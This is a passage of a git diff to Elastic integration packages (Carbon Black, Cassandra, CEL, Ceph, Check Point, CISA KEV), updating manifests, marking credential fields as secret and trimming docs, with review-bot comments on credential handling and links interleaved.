"system.auth.groupadd:*" + "query": "" } } }, @@ -23,14 +25,12 @@ "desc" ] ], - "title": "groupadd logs [Logs System]", - "version": 1 + "title": "Alerts V7 Essential Details [Logs Carbon Black Cloud]" }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38", + "coreMigrationVersion": "7.17.0", + "id": "carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de", "migrationVersion": { - "search": "8.0.0" + "search": "7.9.3" }, "references": [ { diff --git a/packages/carbon_black_cloud/manifest.yml b/packages/carbon_black_cloud/manifest.yml index 4dc983d22c2..716af68aa5f 100644 --- a/packages/carbon_black_cloud/manifest.yml +++ b/packages/carbon_black_cloud/manifest.yml 
@@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: carbon_black_cloud title: VMware Carbon Black Cloud -version: "1.19.1" +version: "2.0.0" description: Collect logs from VMWare Carbon Black Cloud with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/carbon_black_cloud-screenshot.png title: Carbon Black Cloud alert dashboard screenshot @@ -26,8 +26,8 @@ policy_templates: description: Collect Logs from Carbon Black Cloud. inputs: - type: httpjson - title: Collect Carbon Black Cloud logs via API - description: Collect Carbon Black Cloud logs via API. + title: Collect Carbon Black Cloud logs via API using HTTPJSON [Legacy] + description: Collect Carbon Black Cloud logs via API using HTTPJSON. vars: - name: hostname type: text @@ -56,6 +56,7 @@ policy_templates: title: Custom API Secret Key description: API Secret Key with Custom Access Level type. required: true + secret: true - name: api_id type: text title: API ID 
@@ -66,6 +67,75 @@ policy_templates: title: API Secret Key description: API Secret Key with API Access Level type. required: true + secret: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - type: cel + title: Collect Carbon Black Cloud logs via API using CEL [Beta] + description: Collect Carbon Black Cloud logs via API using CEL. 
+ vars: + - name: hostname + type: text + title: Hostname + description: Carbon Black Cloud console Hostname. Find hostname in the console dashboard at the beginning of the web address (Add https:// before the hostname). + required: true + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: org_key + type: text + title: Organization Key + description: Organization Key. + required: true + - name: custom_api_id + type: text + title: Custom API ID + description: API ID with Custom Access Level type. + required: true + - name: custom_api_secret_key + type: password + title: Custom API Secret Key + description: API Secret Key with Custom Access Level type. + required: true + secret: true - name: proxy_url type: text title: Proxy URL @@ -123,11 +193,14 @@ policy_templates: description: It is a required parameter for collecting logs via the AWS S3 Bucket. - name: queue_url type: text - title: "[SQS] Queue URL" + title: "[Global][SQS] Queue URL" multi: false required: false show_user: true - description: URL of the AWS SQS queue that messages will be received from. It is a required parameter for collecting logs via the AWS SQS. + description: |- + URL of the AWS SQS queue that messages will be received from. + This is only required if you want to collect logs via AWS SQS. + This is a global queue URL, i.e this can be overridden by specific local queue URLs for each data stream if required. - name: access_key_id type: password title: Access Key ID 
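Review bot: The `proxy_url` variable added for the HTTPJSON input is `type: text` with no `secret: true`, yet its description instructs users to embed a URL-encoded username and password in it, so any proxy credentials end up stored and displayed in the agent policy in plaintext while the API secret keys a few lines away are marked secret in this same commit; the CEL input's `proxy_url` begins at the hunk's last context lines and continues outside it, and presumably carries the same definition. If the package spec permits `secret` on text variables, consider `secret: true` on both `proxy_url` vars, or move proxy credentials into a separate `type: password` var so the URL itself can stay visible. Separately, the CEL input's `enable_request_tracer` description links to the HTTPJSON page (`filebeat-input-httpjson.html#_request_tracer_filename`); it should point at the CEL input documentation (`filebeat-input-cel.html`) since the tracer option is documented per input. This hunk starts on the previous line.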
@@ -135,6 +208,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -142,13 +216,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 96f769c3961..776174ec3a9 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 - version: "1.16.2" changes: - description: Changed owners diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml index bdd56f0c19f..e541ea0e844 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml @@ -15,3 +15,5 @@ numeric_keyword_fields: - carbonblack.edr.segment_id - carbonblack.edr.sensor_id - rule.id +assert: + hit_count: 21 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml index e55c2a819d4..3237e028ab8 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml 
@@ -13,3 +13,5 @@ numeric_keyword_fields:
 - carbonblack.edr.segment_id
 - carbonblack.edr.sensor_id
 - rule.id
+assert:
+ hit_count: 21
diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml
index a52baab279d..39b560cc338 100644
--- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml
+++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml
@@ -15,3 +15,5 @@ numeric_keyword_fields:
 - carbonblack.edr.segment_id
 - carbonblack.edr.sensor_id
 - rule.id
+assert:
+ hit_count: 21
diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml
index fdb19629873..0fbe453506d 100644
--- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml
+++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -15,3 +15,5 @@ numeric_keyword_fields:
 - carbonblack.edr.segment_id
 - carbonblack.edr.sensor_id
 - rule.id
+assert:
+ hit_count: 21
diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml
index f3e50dbe2f1..97243c9291e 100644
--- a/packages/carbonblack_edr/manifest.yml
+++ b/packages/carbonblack_edr/manifest.yml
@@ -1,9 +1,9 @@
 name: carbonblack_edr
 title: VMware Carbon Black EDR
-version: "1.16.2"
+version: "1.17.0"
 description: Collect logs from VMware Carbon Black EDR with Elastic Agent.
 type: integration
-format_version: "3.0.0"
+format_version: "3.0.3"
 categories: [security, edr_xdr]
 conditions:
 kibana:
diff --git a/packages/cassandra/_dev/build/docs/README.md b/packages/cassandra/_dev/build/docs/README.md
index 9e11dc2ed00..8b0dfe5eeee 100644
--- a/packages/cassandra/_dev/build/docs/README.md
+++ b/packages/cassandra/_dev/build/docs/README.md
@@ -8,10 +8,7 @@ This integration has been tested against `Cassandra version 3.11.11`. ### Troubleshooting -If log.flags is shown conflicted under the ``logs-*`` data view, then this issue can be solved by reindexing the ``Logs`` data stream's indices. - -Note: -- This [document](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) provides details about reindexing. +- If `log.flags` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Logs`` data stream. ## Logs diff --git a/packages/cassandra/changelog.yml b/packages/cassandra/changelog.yml index b1fbe519dfd..a20e00bdec5 100644 --- a/packages/cassandra/changelog.yml +++ b/packages/cassandra/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.12.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: 1.12.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.11.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.11.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: 1.10.1 + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: 1.10.0 changes: - description: Update the package format_version to 3.0.0. 
diff --git a/packages/cassandra/docs/README.md b/packages/cassandra/docs/README.md index f1e5571a97a..0aed2b47ac8 100644 --- a/packages/cassandra/docs/README.md +++ b/packages/cassandra/docs/README.md @@ -8,10 +8,7 @@ This integration has been tested against `Cassandra version 3.11.11`. ### Troubleshooting -If log.flags is shown conflicted under the ``logs-*`` data view, then this issue can be solved by reindexing the ``Logs`` data stream's indices. - -Note: -- This [document](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) provides details about reindexing. +- If `log.flags` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Logs`` data stream. ## Logs diff --git a/packages/cassandra/manifest.yml b/packages/cassandra/manifest.yml index 34d4680c712..d25cb22ae33 100644 --- a/packages/cassandra/manifest.yml +++ b/packages/cassandra/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cassandra title: Cassandra -version: "1.10.0" +version: "1.12.1" description: This Elastic integration collects logs and metrics from cassandra. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -61,6 +61,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/cef/changelog.yml b/packages/cef/changelog.yml index 23f22e41983..5f87debe689 100644 --- a/packages/cef/changelog.yml +++ b/packages/cef/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.17.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.16.2" changes: - description: Changed owners diff --git a/packages/cef/manifest.yml b/packages/cef/manifest.yml index 295f6012ea1..aae5b0767da 100644 --- a/packages/cef/manifest.yml +++ b/packages/cef/manifest.yml @@ -1,13 +1,13 @@ name: cef title: Common Event Format (CEF) -version: "2.16.2" +version: "2.17.0" description: Collect logs from CEF Logs with Elastic Agent. categories: - security conditions: kibana: version: ^8.6.1 -format_version: "3.0.0" +format_version: "3.0.3" policy_templates: - name: cef title: CEF logs diff --git a/packages/cel/changelog.yml b/packages/cel/changelog.yml index 4a1ac2d416e..cc0d3f88c90 100644 --- a/packages/cel/changelog.yml +++ b/packages/cel/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.9.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "1.8.0" + changes: + - description: Clarify naming of input. + type: enhancement + link: https://github.com/elastic/integrations/pull/9018 - version: "1.7.1" changes: - description: Changed owners diff --git a/packages/cel/docs/README.md b/packages/cel/docs/README.md index 6b6579267fa..6773e9e085d 100644 --- a/packages/cel/docs/README.md +++ b/packages/cel/docs/README.md 
@@ -1,8 +1,8 @@ # CEL Custom API input integration -The CEL custom API input integration is used to ingest data from custom HTTP and local file-system APIs that do not currently have an existing integration. +The Common Expression Language (CEL) custom API input integration is used to ingest data from custom HTTP and local file-system APIs that do not currently have an existing integration. -The input itself supports making both HTTP requests and file-system read operations, and keeping running and persistent state on information from the last collected events. The input performs [Common Expression Language](https://opensource.google.com/projects/cel) with a [set of standard extensions](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_cel_extension_libraries) to both obtain input data from the API and then process the data into events that are published to Elasticsearch. +The input itself supports making both HTTP requests and file-system read operations, and keeping running and persistent state on information from the last collected events. The input performs [Common Expression Language](https://opensource.google.com/projects/cel) expression evaluation with a [set of standard extensions](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_cel_extension_libraries) to both obtain input data from the API and then process the data into events that are published to Elasticsearch. ## Configuration diff --git a/packages/cel/manifest.yml b/packages/cel/manifest.yml index 369166dc300..e5566014cb5 100644 --- a/packages/cel/manifest.yml +++ b/packages/cel/manifest.yml 
@@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cel -title: CEL Custom API +title: Custom API using Common Expression Language description: Collect custom events from an API with Elastic agent type: input -version: "1.7.1" +version: "1.9.0" categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: "basic" policy_templates: @@ -102,6 +102,7 @@ policy_templates: show_user: true required: false description: The password to be used with Basic Auth headers + secret: true - name: oauth_id type: text title: Oauth2 Client ID @@ -114,12 +115,14 @@ policy_templates: description: Client secret used for Oauth2 authentication show_user: true required: false + secret: true - name: oauth_token_url type: text title: Oauth2 Token URL description: The URL endpoint that will be used to generate the tokens during the oauth2 flow. It is required if no oauth_custom variable is set or provider is not specified in oauth_custom variable. show_user: true required: false + secret: false - name: redact_fields type: text title: Redacted fields diff --git a/packages/ceph/_dev/build/docs/README.md b/packages/ceph/_dev/build/docs/README.md index cb2fbfb83ad..ec84c3ef721 100644 --- a/packages/ceph/_dev/build/docs/README.md +++ b/packages/ceph/_dev/build/docs/README.md 
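Review bot: In the `@@ -114,12 +115,14 @@` hunk, `oauth_token_url` receives an explicit `secret: false` while every other variable touched by this commit only sets `secret` when it is true; if false is the spec default the line is redundant, and if it is a deliberate record that the token URL was reviewed and judged non-sensitive, a short comment would stop the next reader from "fixing" it to true. Suggest `secret: false # endpoint URL, not a credential; intentionally visible in the policy` or dropping the line for consistency with `oauth_id`, which also has no `secret` key.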
@@ -89,97 +89,7 @@ After the integration is successfully configured, clicking on the Assets tab of ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Cluster Disk``, ``Cluster Health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Ceph -> Integration policies` open the configuration of Ceph and disable the `Collect Ceph metrics` toggle to reindex logs data streams and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-ceph.cluster_disk-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-ceph.cluster_disk-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-ceph.cluster_disk -``` -3. Go to `Integrations -> Ceph -> Settings` and click on `Reinstall Ceph`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-ceph.cluster_disk-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. 
Start the data stream by going to the `Integrations -> Ceph -> Integration policies` and open configuration of integration and enable the `Collect Ceph metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster Disk``, ``Cluster health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data streams. ## Metrics reference diff --git a/packages/ceph/changelog.yml b/packages/ceph/changelog.yml index 53a0d967d12..c827cf3beee 100644 --- a/packages/ceph/changelog.yml +++ b/packages/ceph/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.4.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Limit request tracer log count to five. 
diff --git a/packages/ceph/docs/README.md b/packages/ceph/docs/README.md index 666606ab0c2..7543210cbd3 100644 --- a/packages/ceph/docs/README.md +++ b/packages/ceph/docs/README.md 
@@ -89,97 +89,7 @@ After the integration is successfully configured, clicking on the Assets tab of ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Cluster Disk``, ``Cluster Health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Ceph -> Integration policies` open the configuration of Ceph and disable the `Collect Ceph metrics` toggle to reindex logs data streams and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-ceph.cluster_disk-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-ceph.cluster_disk-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-ceph.cluster_disk -``` -3. Go to `Integrations -> Ceph -> Settings` and click on `Reinstall Ceph`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-ceph.cluster_disk-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. 
Start the data stream by going to the `Integrations -> Ceph -> Integration policies` and open configuration of integration and enable the `Collect Ceph metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster Disk``, ``Cluster health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data streams. ## Metrics reference diff --git a/packages/ceph/manifest.yml b/packages/ceph/manifest.yml index 41dee9e4db9..81110b47cac 100644 --- a/packages/ceph/manifest.yml +++ b/packages/ceph/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ceph title: Ceph -version: "1.2.0" +version: "1.4.1" description: This Elastic integration collects metrics from Ceph instance. type: integration categories: @@ -9,7 +9,7 @@ categories: - os_system conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -63,6 +63,7 @@ policy_templates: - name: api_secret type: password title: API Secret Key + secret: true show_user: true required: true default: 52dffd92-a103-4a10-bfce-5b60f48f764e diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml index 212493018c9..1e94752601d 100644 --- a/packages/checkpoint/changelog.yml +++ b/packages/checkpoint/changelog.yml 
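Review bot: `secret: true` on `api_secret` makes Fleet store the API secret key as a secret, but the same var still ships a hard-coded `default: 52dffd92-a103-4a10-bfce-5b60f48f764e` that every policy inherits unless the user overrides it, and a published default for a secret-typed field undoes most of what secret storage buys. If that value exists only so the system tests can run, move it into the package's system test config (the `_dev/test/system/*-config.yml` convention used elsewhere in this diff) and drop the `default:` here, keeping `required: true` so a real value must be supplied. The `kibana: version: ^8.12.0` bump in the earlier hunk of this file is the right companion to `secret: true`, since the changelog entry in this same diff names 8.12 as the version that supports it.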
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.31.0"
+ changes:
+ - description: Update package-spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.30.2"
 changes:
 - description: Changed owners
diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml
index 3acfe3ea1ab..26c0b791d53 100644
--- a/packages/checkpoint/manifest.yml
+++ b/packages/checkpoint/manifest.yml
@@ -1,9 +1,9 @@
 name: checkpoint
 title: Check Point
-version: 1.30.2
+version: "1.31.0"
 description: Collect logs from Check Point with Elastic Agent.
 type: integration
-format_version: "3.0.1"
+format_version: "3.0.3"
 categories: [security, network, firewall_security]
 conditions:
 kibana:
diff --git a/packages/cisa_kevs/LICENSE.txt b/packages/cisa_kevs/LICENSE.txt
new file mode 100644
index 00000000000..44d36d98d5e
--- /dev/null
+++ b/packages/cisa_kevs/LICENSE.txt
@@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2024 nicpenning + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/packages/cisa_kevs/_dev/build/build.yml b/packages/cisa_kevs/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/cisa_kevs/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/cisa_kevs/_dev/build/docs/README.md b/packages/cisa_kevs/_dev/build/docs/README.md new file mode 100644 index 00000000000..62c9453f9c0 --- /dev/null +++ b/packages/cisa_kevs/_dev/build/docs/README.md 
@@ -0,0 +1,48 @@ +# CISA KEV integration + +This integration is for [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) logs. This data can be useful for current awareness of Known Exploited Vulnerabilities according to CISA and also for enriching other vulnerability scan data in the Elastic stack. The integration periodically checks for the latest CISA KEV list. It includes the following datasets for retrieving logs from the CISA KEV website: + +- `vulnerability` dataset: Supports vulnerabilities classified as known exploited from CISA. + +### Example Enrich Policy and ES|QL Correlation Query + +An enrich policy can be created to have other vulnerability information be enriched based on the CVE number. + +The following requests can be used to create and execute the enrich policy after the integration has been installed: + +``` +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev +{ + "match": { + "indices": ".ds-logs-cisa_kevs.vulnerability-*", + "match_field": "vulnerability.id", + "enrich_fields": ["cisa_kev.vulnerability.date_added", "cisa_kev.vulnerability.due_date", "cisa_kev.vulnerability.known_ransomware_campaign_use", "cisa_kev.vulnerability.name", "cisa_kev.vulnerability.notes","cisa_kev.vulnerability.product","cisa_kev.vulnerability.required_action","cisa_kev.vulnerability.vendor_project"] + } +} + +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev/_execute +``` + +Here is an example ES|QL query that uses the index pattern of logs-nessus.vulnerability* to enrich the data source with CISA KEV information and keeping the top 10 results. 
Note, the enrich policy (shown above) must be created first: + +``` +from logs-nessus.vulnerability* +| where vulnerability.id IS NOT NULL +| keep vulnerability.*, nessus.plugin.name, host.name +| enrich enrich_cve_with_context_cisa_kev with cisa_kev.vulnerability.due_date, cisa_kev.vulnerability.known_ransomware_campaign_use, cisa_kev.vulnerability.name, cisa_kev.vulnerability.notes, cisa_kev.vulnerability.product, cisa_kev.vulnerability.required_action, cisa_kev.vulnerability.vendor_project, cisa_kev.vulnerability.date_added +| where cisa_kev.vulnerability.name IS NOT NULL +| stats count = COUNT(host.name) BY nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.date_added, cisa_kev.vulnerability.product +| sort count desc +| keep nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.product, cisa_kev.vulnerability.date_added, count +| limit 10 +``` + +## Logs + +### Vulnerabilities + +The CISA KEV data_stream retrieves vulnerability information from the endpoint `https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`. + +{{event "vulnerability"}} + +{{fields "vulnerability"}} \ No newline at end of file diff --git a/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml b/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..c09fbc181a1 --- /dev/null +++ b/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,14 @@ +version: "2.3" +services: + cisakev: + image: docker.elastic.co/observability/stream:v0.7.0 + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/cisa_kevs/_dev/deploy/docker/files/config.yml b/packages/cisa_kevs/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..fba19a18d4b --- /dev/null +++ b/packages/cisa_kevs/_dev/deploy/docker/files/config.yml 
